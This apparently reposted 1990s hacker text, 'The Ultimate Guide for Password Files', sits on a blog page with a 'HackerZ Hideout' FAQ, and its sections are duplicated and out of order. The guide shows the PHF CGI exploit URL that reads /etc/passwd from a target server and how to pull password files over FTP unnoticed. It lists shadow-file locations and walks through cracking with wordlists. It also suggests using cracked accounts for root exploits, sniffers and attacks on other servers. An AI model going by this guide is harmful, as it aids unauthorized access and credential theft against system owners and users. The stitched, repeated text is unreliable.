UNIX Paths (Courtesy of 2600)
UNIX Path Token
----------------------------AIX 3 /etc/security/passwd !
or /tcb/auth/files/first letter #
A/UX 3.0 s /tcb/files/auth/?/ * BSD4.3 -Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd [.dir|.pag] * SCO Unix #.2 .x /tcb/auth/files/ / * SunOS4.1+ c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow optional NIS+ private secure maps/tables/whatever
System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb * Anyway once you have the passwd file (with user names) and shadow file you can find a unshadowing program which combines the passwd file and the shadow passwd and combines them into what a regualr passwd file would be. A unshadowing program can be found at http://www.hackersclub.com/k m/downloads/password_crack er/ucfjohn2.zip Now some servers have the shadow file on retrictions so no one without a special account on the server can get to it.
________________________6. Crackers
Now that you have gotten a passwd file, what the hell do you do it it to get passwords from it? Thats where crackers come in.
A cracker takes the passwd file and a wordlist and compares the wordlist to the passwd files encrypted passwd. I have used many different crackers. Everyone has their favorite. My personal favorite is one called PaceCrack95 Ver. 1.1
http://tms.netrom.com/~cassi dy/utils/pacec.zip
Many people swear that John the Ripper is the greatest but i have problems with it, but it can be gotten off any decent hacking page. Same for Cracker Jack. A Cracker will load a wordlist and a passwd file and compare the two. When it cracks a password it will tell you the user name and the unencrypted password. You don't need to write it down because the program auto saves it. Cracker Jack saves the file as jack.pot and i think John the Ripper does too. PaceCrack95 Ver. 1.1 saves it to the files name (ex., passwd.txt.db) with the exact name and makes it a.DB file. I like to keep a passwd file once i have cracked it and later try out a new passwd cracker on it with the same wordlist and see if it works or if it is fake. It helps
________________________7. Wordlists
Wordlists are a nessicity to cracking passwd files. They are just huge lists of words. The biggest wordlist is avaliable from here: ftp://ftp.ox.ac.uk/pub/wordlists/
If you get a passwd file from another contry get a wordlist with the same launguage as the worlist came from, as the users would probably use words they are familier with There are some programs which can make random numbers to what you specify but that might not be really great, since there is such a huge amount of number combinations they could use. I am not completly saying they are useless since i have cracked a password with one before, I had fashoned my own list of 4 digit numbers since people might use their phone number and well it worked
________________________8. What to do with a Cracked Passwd file
What you can do with a passwd is up to you. The nice thing to do is inform the administator of the server that, accounts on his (or her) server are insucure and possibly open to anyone hacking an account and bringing havok upon their server. Some other things you can do is fire up good ole telnet and connect to one of theirrts and see what you could do with that account. The possiblities are endless. You could hack a webpage (i wouldn't do that on account of how lame it is to destruct someones piece of work.)
You could use an exploit in sendmail and get root or install a sniffer on the system and get all the passwords you could ever want from it. You could use the account to do work on OTHER servers that you sure as hell wouldn't want to do from your own. If your account is canceled you can use a hacked accounts dial up till you purchase a new one. Like I said the list goes on and on. I am sure noone wants you doing anything destuctive (its lame anyhow.) And the best thing to do is report the problem to the system admin so, if he finds out he won't freak and call your admin and tell him you have been doing naughty things or even call the cops. I hope this text was informative enough to fufill your needs
Now if you happen to find a passwd fiel that looks something like this: "joetest:*:102 :100::/home/joetest:/usr/bin/re stsh"
which has a user name, not a programs, you have a shadowed passwd. The shadow file has the encrypted passwords on it. Depending on the Operating System, the passwd file may be in different places. To find out what Operating system your target is running from telnet (connected to that server of course) type uname -a and it should say, if you cannot get to telnet there is other methods of finding out. Here is a guide to systems passwd file locations (taken from a text on passwd files by Kryto.) A token is the * (or other symbol) beside a shadowed passwds user name
UNIX Paths (Courtesy of 2600)
UNIX Path Token
----------------------------AIX 3 /etc/security/passwd !
or /tcb/auth/files/first letter #
A/UX 3.0 s /tcb/files/auth/?/ * BSD4.3 -Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd [.dir|.pag] * SCO Unix #.2 .x /tcb/auth/files/
System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb * Anyway once you have the passwd file (with user names) and shadow file you can find a unshadowing program which combines the passwd file and the shadow passwd and combines them into what a regualr passwd file would be. A unshadowing program can be found at http://www.hackersclub.com/k m/downloads/password_crack er/ucfjohn2.zip Now some servers have the shadow file on retrictions so no one without a special account on the server can get to it.
________________________6. Crackers
Now that you have gotten a passwd file, what the hell do you do it it to get passwords from it? Thats where crackers come in.
A cracker takes the passwd file and a wordlist and compares the wordlist to the passwd files encrypted passwd. I have used many different crackers. Everyone has their favorite. My personal favorite is one called PaceCrack95 Ver. 1.1
http://tms.netrom.com/~cassi dy/utils/pacec.zip
Many people swear that John the Ripper is the greatest but i have problems with it, but it can be gotten off any decent hacking page. Same for Cracker Jack. A Cracker will load a wordlist and a passwd file and compare the two. When it cracks a password it will tell you the user name and the unencrypted password. You don't need to write it down because the program auto saves it. Cracker Jack saves the file as jack.pot and i think John the Ripper does too. PaceCrack95 Ver. 1.1 saves it to the files name (ex., passwd.txt.db) with the exact name and makes it a.DB file. I like to keep a passwd file once i have cracked it and later try out a new passwd cracker on it with the same wordlist and see if it works or if it is fake. It helps
________________________7. Wordlists
Wordlists are a nessicity to cracking passwd files. They are just huge lists of words. The biggest wordlist is avaliable from here: ftp://ftp.ox.ac.uk/pub/wordlists/
If you get a passwd file from another contry get a wordlist with the same launguage as the worlist came from, as the users would probably use words they are familier with There are some programs which can make random numbers to what you specify but that might not be really great, since there is such a huge amount of number combinations they could use. I am not completly saying they are useless since i have cracked a password with one before, I had fashoned my own list of 4 digit numbers since people might use their phone number and well it worked
________________________8. What to do with a Cracked Passwd file
What you can do with a passwd is up to you. The nice thing to do is inform the administator of the server that, accounts on his (or her) server are insucure and possibly open to anyone hacking an account and bringing havok upon their server. Some other things you can do is fire up good ole telnet and connect to one of theirrts and see what you could do with that account. The possiblities are endless. You could hack a webpage (i wouldn't do that on account of how lame it is to destruct someones piece of work.)
You could use an exploit in sendmail and get root or install a sniffer on the system and get all the passwords you could ever want from it. You could use the account to do work on OTHER servers that you sure as hell wouldn't want to do from your own. If your account is canceled you can use a hacked accounts dial up till you purchase a new one. Like I said the list goes on and on. I am sure noone wants you doing anything destuctive (its lame anyhow.) And the best thing to do is report the problem to the system admin so, if he finds out he won't freak and call your admin and tell him you have been doing naughty things or even call the cops. I hope this text was informative enough to fufill your needs
The Ultimate Guide for Password Files...Part 1
CONTENTS
1. Introduction
2. What is a Passwd File?
3. PHF Exploit
4. FTP Passwd
5. Shadowed Passwds
6. Crackers
7. Wordlists
8. Using Cracked Passwds
________________________
1. Introduction
Passwd files are the easist and simplist ways to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course the minute you sign on the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activites. If you choose to do illegal activies with the information from this it is no one's fault but your own. Now down to the good stuff [=.
________________________2. What is a Passwd File
A passwd file is an encrypted file that contains the users on a servers passwords. The key word here is encrypted, so don't start thinking all i have to do is find one and i hit the jackpot. Nope sorry Man, theres alot more to it than that. The passwd file should look something like this
root:x:0 :1 :0000 - Admin(0000):/:/bin/ksh
daemon:x:1 :1 :0000 -Admin(0000):/:
bin:x:2 :2 :0000 - Admin(0000):/usr/bin:
listen:x:37 :4 :Network Admin:/usr/net/nls:nobody:x: 60001 : 60001 :uid
nobody:/:noaccess:x: 60002 : 60002 :uid noaccess:/:
ftp:x:101 :4:
FTPUser:/export/home/ftp:
rrc:uXDg04 UkZgWOQ:201 :4:RichardClark:/export/home/rrc
Out of that entire section the only name you could use would be rrc:uXDg04 UkZgWOQ:201 :4:RichardClark:/export/home/rcc Heres how you read the File
rrc:uXDg04 UkZgWOQ:201 :4:RichardClark:/export/home/rcc
Username: rcc
Encrypted Password: uXDg04UkZgWOQ
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
Because it is the only name with an encrypted password.
You will never find a passwd file that has a passwd for
anything like ftp, listen, bin, etc., etc. Occasionally
using the PHF exploit or unshadowing a passwd file you can get an encrypted password for root.
________________________
3. PHF Exploit
First let me explain what an exploit is. An Exploit is a hole in software that allows someone to get something out of it that... Well you aren't supposed to.
The PHF exploit is a hole in CGI, that most servers have fixed now (if they have CGI). Lets just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many forien servers have this open. Unlike the FTP Passwd you don't even have to access their FTP or login. What you do is get a WWW browser and then in the plass for the WWW address type:
http://www.target.com/cgi- bin/phf?Qalias=j00 %ffcat%20/etc/passwd
In www.target.com Place who's passwd you want to get. If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate,
or the server has been instructed not to let you have it." its not there. If you get "You have been caught on Candid Camera!" They caught you, but don't fear they rarly ever Report you. I have yet to find a server that does report. Of course if you get "root:JPfsdh1 NAjIUw:0 :0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7 m9 I:0 :0:
Regular Admin login:/admin:/sbin/sh
bin:*:2 :2:Admin :/bin:
sys:*:3 :3:Admin :/usr/src:
adm:*:4 :4:Admin :/usr/adm:/sbin/sh
daemon:*:1 :1: Daemon Login for daemons needing
nobody:*: 65534 : 65534 ::/:
ftp:*:39 :39:FTP guest login:/var/ftp:
dtodd:yYn1 sav8 tKzOI:101 :100:John Todd:/home/dtodd:/sbin/sh
joetest:0 IeSH6 HfEEIs2 :102 :100::/home/joetest:/usr/bin/re stsh"
You have hit the jackpot [=. Save the file as a text and keep it handy, because you will need it for later in the lesson.
________________________4. FTP Passwd
The Passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous logins rule. If you are desprite to get a passwd file from a certain server (which may not even be open, so only do if you are desprite or you want to hack your own server) get an account that allows you access to their FTP. What you do is get an FTP client such as WS FTP or CuteFTP. Find the servers name and connect to it. You should get a list of Directories like "etc, hidden, incoming, pub" goto the one called etc. inside etc should be a few files like "group, passwd" if any chance you see one called shadow there is a 8 /10 chance you are about to deal with a shadowed passwd. Well get the passwd file and maybe check out what else is on the server so it won't look so suspious. Anyway when you log out, run and check out your new passwd file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin" with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:" with a * (or another symbol) you have a shadowed passwd. Of course if you have been reading and paying attention if you have something that has a few things that look like:
"joetest:0 IeSH6 HfEEIs2 :102 :100::/home/joetest:/usr/bin/re stsh"
You have gotten one you can crack
________________________chk part 2 to continue reading...
1. Introduction
2. What is a Passwd File?
3. PHF Exploit
4. FTP Passwd
5. Shadowed Passwds
6. Crackers
7. Wordlists
8. Using Cracked Passwds
________________________
1. Introduction
Passwd files are the easist and simplist ways to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course the minute you sign on the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activites. If you choose to do illegal activies with the information from this it is no one's fault but your own. Now down to the good stuff [=.
________________________2. What is a Passwd File
A passwd file is an encrypted file that contains the users on a servers passwords. The key word here is encrypted, so don't start thinking all i have to do is find one and i hit the jackpot. Nope sorry Man, theres alot more to it than that. The passwd file should look something like this
root:x:0 :1 :0000 - Admin(0000):/:/bin/ksh
daemon:x:1 :1 :0000 -Admin(0000):/:
bin:x:2 :2 :0000 - Admin(0000):/usr/bin:
listen:x:37 :4 :Network Admin:/usr/net/nls:nobody:x: 60001 : 60001 :uid
nobody:/:noaccess:x: 60002 : 60002 :uid noaccess:/:
ftp:x:101 :4:
FTPUser:/export/home/ftp:
rrc:uXDg04 UkZgWOQ:201 :4:RichardClark:/export/home/rrc
Out of that entire section the only name you could use would be rrc:uXDg04 UkZgWOQ:201 :4:RichardClark:/export/home/rcc Heres how you read the File
rrc:uXDg04 UkZgWOQ:201 :4:RichardClark:/export/home/rcc
Username: rcc
Encrypted Password: uXDg04UkZgWOQ
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
Because it is the only name with an encrypted password.
You will never find a passwd file that has a passwd for
anything like ftp, listen, bin, etc., etc. Occasionally
using the PHF exploit or unshadowing a passwd file you can get an encrypted password for root.
________________________
3. PHF Exploit
First let me explain what an exploit is. An Exploit is a hole in software that allows someone to get something out of it that... Well you aren't supposed to.
The PHF exploit is a hole in CGI, that most servers have fixed now (if they have CGI). Lets just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many forien servers have this open. Unlike the FTP Passwd you don't even have to access their FTP or login. What you do is get a WWW browser and then in the plass for the WWW address type:
http://www.target.com/cgi- bin/phf?Qalias=j00 %ffcat%20/etc/passwd
In www.target.com Place who's passwd you want to get. If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate,
or the server has been instructed not to let you have it." its not there. If you get "You have been caught on Candid Camera!" They caught you, but don't fear they rarly ever Report you. I have yet to find a server that does report. Of course if you get "root:JPfsdh1 NAjIUw:0 :0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7 m9 I:0 :0:
Regular Admin login:/admin:/sbin/sh
bin:*:2 :2:Admin :/bin:
sys:*:3 :3:Admin :/usr/src:
adm:*:4 :4:Admin :/usr/adm:/sbin/sh
daemon:*:1 :1: Daemon Login for daemons needing
nobody:*: 65534 : 65534 ::/:
ftp:*:39 :39:FTP guest login:/var/ftp:
dtodd:yYn1 sav8 tKzOI:101 :100:John Todd:/home/dtodd:/sbin/sh
joetest:0 IeSH6 HfEEIs2 :102 :100::/home/joetest:/usr/bin/re stsh"
You have hit the jackpot [=. Save the file as a text and keep it handy, because you will need it for later in the lesson.
________________________4. FTP Passwd
The Passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous logins rule. If you are desprite to get a passwd file from a certain server (which may not even be open, so only do if you are desprite or you want to hack your own server) get an account that allows you access to their FTP. What you do is get an FTP client such as WS FTP or CuteFTP. Find the servers name and connect to it. You should get a list of Directories like "etc, hidden, incoming, pub" goto the one called etc. inside etc should be a few files like "group, passwd" if any chance you see one called shadow there is a 8 /10 chance you are about to deal with a shadowed passwd. Well get the passwd file and maybe check out what else is on the server so it won't look so suspious. Anyway when you log out, run and check out your new passwd file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin" with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:" with a * (or another symbol) you have a shadowed passwd. Of course if you have been reading and paying attention if you have something that has a few things that look like:
"joetest:0 IeSH6 HfEEIs2 :102 :100::/home/joetest:/usr/bin/re stsh"
You have gotten one you can crack
________________________chk part 2 to continue reading...
HACKERZ HIDEOUT;most commony asked questions and their answers (F.A.Q]
This FAQ was written due to the amount of repeated questions asked
Via email. I receive anywhere from 50-200 emails daily asking
me questions about hacking. This hopefully will answer some
of the more common questions.
(Q) Why doesn't the hideout have anything on viruses?
(A) I personally do not believe in viruses. They are not a form of
hacking. The intent of viruses is to be malicious. Some viruses
are not malicious but there are few of those. I do however like
to see new and exciting ones. Most nowadays are modified copies
of original viruses. Plain and simple...if you want to learn
about them read an Assembly book.
(Q) Where can I get that cool background usic you have on your
webpage?
(A) I don't mind people taking me stuff...in fact it's a form of
flattery in my opinion. However you should know that in Netscape
(and maybe other www browsers) you can view the document source
code. Look for the.MID and copy that code. If you want to
download the file direct. www.hackersclub.com/km/midis /midi.html and download
the ones you want. I've also made it where you can listen to them before you download.
(Q) Why don't you carry Warez? (Pirated Software)
(A) Should I even answer this? All emails of this nature are deleted without an
answer. Its simple pirated software is illegal. Do you want your server seized?
Most of the Warez Websites you see won't last 3 months. SPA/BSA will find you along
with MS reps and other software companies who pay people to hunt these sites down.
Your best bet if your looking for this software and such is either look for these sites
via a search engine or join IRC and jump into channels like #exceed and download to
your hearts content. I did write a text file on getting pirated software in IRC.
Download it from the file area.
(Q) No cracks either?
(A) Yup. Cracks are illegal too if you use them to crack software *YOU* personally didn't buy.
You can read the legit SPA form in the LAW area of the HackerZ Hideout. However if you
use the cracks on software you own already (registered copies of course) it is legal.
(Q) Do you personally hack?
(A) Long time ago I use to mess around and cause havoc. Now I just bring together all aspects
of the scene and deliver a small piece to people. I am retired and will stay that way.
My plans are to run a good hacking page for people who are curious in learning.
(Q) What do you use for your graphics?
(A) Adobe PhotoShop v3 with the Alien Skin Plugins. Most of the graphics are made by me or by
my wife.
(Q) Why does it take so long for you webpage to load?
(A) I did a lot of graphics and added music to the pages. I wanted my site to be visually
appealing along with being a good source of information. If you have already seen the
site with the graphics, I have put together a TEXT version of the Hideout.
(Q) Can I link to your site?
(A) By all means go for it. Tell everyone about this site.
(Q) Why do you ban links from Geocites and Angelfire?
(A) Those 2 places seem to censor and move Hack/Phreak/Warez pages off to frequently. Plus
with only 1-2 megs in space there isn't much a page could have. Links and information
maybe. I will only make cases for those pages that really do have a lot of information.
(Q) What is Warez-Waldo?
(A) Warez-Waldo is nothing more than an IRC channel on Effnet. We don't trade Warez or
distribute pirated software. We are a group of people who go in there to hang out and
converse like everyday people. We are not a pirate group, hack group or courier group.
(Q) Do you subscribe to 2600 magazine?
(A) Yes. Don't you? Magazine is full of goodies and the chief editor happens to have the
same last name as I do. =)
(Q) Why run a hacking page?
(A) I've thought about this for a long time. I think the reason I run such a page if for
learning purposes. I think because of all the research and hands on training that I have
had it has helped me achieve a goalI know what a hacker might think of in terms of breaking in that most system admins can
only dream of. I live, breath and lust for computers. All I can say is that for once
in my life I have a job where I am happy and haven't complained and I owe it to playing
on the computer.
(Q) Will you ever hack again?
(A) Of course but it will be only on my personal machines or maybe even helping out people
at work protect their data.
(Q) How do I view your files?
(A) The files that I have are most than likely compressed using pkzip. If you are a windows
user I would suggest getting Winzip. You can download a shareware copy at www.winzip.com.
If you're a beloved dos user, you can download the latest pkware from www.shareware.com. You
will need to save these files to your computer's hard drive and use these programs to
uncompress them. ** ALWAYS ** scan the files before executing them.
(Q) What do I do with the C files?
(A) These C programs are for Unix. You can download them but you will need to compile them
using your Unix shell account.
(Q) Can I get on your mailing list for updates?
(A) On the Entrance page to the Hideout there is a section at the bottom where you can choose
the page to monitor on the Hideout. When it gets update you will receive an email saying
it was updated.
(Q) Why you put a lame dos trick/hack in the newbies area?
(A) How many people know the ASCII blank?? I would say most people don't. Especially parents
and teachers. Its a good little trick to *START* off with. Mainly to get the brain cells active..RoneY...
Via email. I receive anywhere from 50-200 emails daily asking
me questions about hacking. This hopefully will answer some
of the more common questions.
(Q) Why doesn't the hideout have anything on viruses?
(A) I personally do not believe in viruses. They are not a form of
hacking. The intent of viruses is to be malicious. Some viruses
are not malicious but there are few of those. I do however like
to see new and exciting ones. Most nowadays are modified copies
of original viruses. Plain and simple...if you want to learn
about them read an Assembly book.
(Q) Where can I get that cool background usic you have on your
webpage?
(A) I don't mind people taking me stuff...in fact it's a form of
flattery in my opinion. However you should know that in Netscape
(and maybe other www browsers) you can view the document source
code. Look for the.MID and copy that code. If you want to
download the file direct. www.hackersclub.com/km/midis /midi.html and download
the ones you want. I've also made it where you can listen to them before you download.
(Q) Why don't you carry Warez? (Pirated Software)
(A) Should I even answer this? All emails of this nature are deleted without an
answer. Its simple pirated software is illegal. Do you want your server seized?
Most of the Warez Websites you see won't last 3 months. SPA/BSA will find you along
with MS reps and other software companies who pay people to hunt these sites down.
Your best bet if your looking for this software and such is either look for these sites
via a search engine or join IRC and jump into channels like #exceed and download to
your hearts content. I did write a text file on getting pirated software in IRC.
Download it from the file area.
(Q) No cracks either?
(A) Yup. Cracks are illegal too if you use them to crack software *YOU* personally didn't buy.
You can read the legit SPA form in the LAW area of the HackerZ Hideout. However if you
use the cracks on software you own already (registered copies of course) it is legal.
(Q) Do you personally hack?
(A) Long time ago I use to mess around and cause havoc. Now I just bring together all aspects
of the scene and deliver a small piece to people. I am retired and will stay that way.
My plans are to run a good hacking page for people who are curious in learning.
(Q) What do you use for your graphics?
(A) Adobe PhotoShop v3 with the Alien Skin Plugins. Most of the graphics are made by me or by
my wife.
(Q) Why does it take so long for you webpage to load?
(A) I did a lot of graphics and added music to the pages. I wanted my site to be visually
appealing along with being a good source of information. If you have already seen the
site with the graphics, I have put together a TEXT version of the Hideout.
(Q) Can I link to your site?
(A) By all means go for it. Tell everyone about this site.
(Q) Why do you ban links from Geocites and Angelfire?
(A) Those 2 places seem to censor and move Hack/Phreak/Warez pages off to frequently. Plus
with only 1-2 megs in space there isn't much a page could have. Links and information
maybe. I will only make cases for those pages that really do have a lot of information.
(Q) What is Warez-Waldo?
(A) Warez-Waldo is nothing more than an IRC channel on Effnet. We don't trade Warez or
distribute pirated software. We are a group of people who go in there to hang out and
converse like everyday people. We are not a pirate group, hack group or courier group.
(Q) Do you subscribe to 2600 magazine?
(A) Yes. Don't you? Magazine is full of goodies and the chief editor happens to have the
same last name as I do. =)
(Q) Why run a hacking page?
(A) I've thought about this for a long time. I think the reason I run such a page if for
learning purposes. I think because of all the research and hands on training that I have
had it has helped me achieve a goalI know what a hacker might think of in terms of breaking in that most system admins can
only dream of. I live, breath and lust for computers. All I can say is that for once
in my life I have a job where I am happy and haven't complained and I owe it to playing
on the computer.
(Q) Will you ever hack again?
(A) Of course but it will be only on my personal machines or maybe even helping out people
at work protect their data.
(Q) How do I view your files?
(A) The files that I have are most than likely compressed using pkzip. If you are a windows
user I would suggest getting Winzip. You can download a shareware copy at www.winzip.com.
If you're a beloved dos user, you can download the latest pkware from www.shareware.com. You
will need to save these files to your computer's hard drive and use these programs to
uncompress them. ** ALWAYS ** scan the files before executing them.
(Q) What do I do with the C files?
(A) These C programs are for Unix. You can download them but you will need to compile them
using your Unix shell account.
(Q) Can I get on your mailing list for updates?
(A) On the Entrance page to the Hideout there is a section at the bottom where you can choose
the page to monitor on the Hideout. When it gets update you will receive an email saying
it was updated.
(Q) Why you put a lame dos trick/hack in the newbies area?
(A) How many people know the ASCII blank?? I would say most people don't. Especially parents
and teachers. Its a good little trick to *START* off with. Mainly to get the brain cells active..RoneY...
Subscribe to:
Posts (Atom)
Follow Me... Stay Connected
MY STATS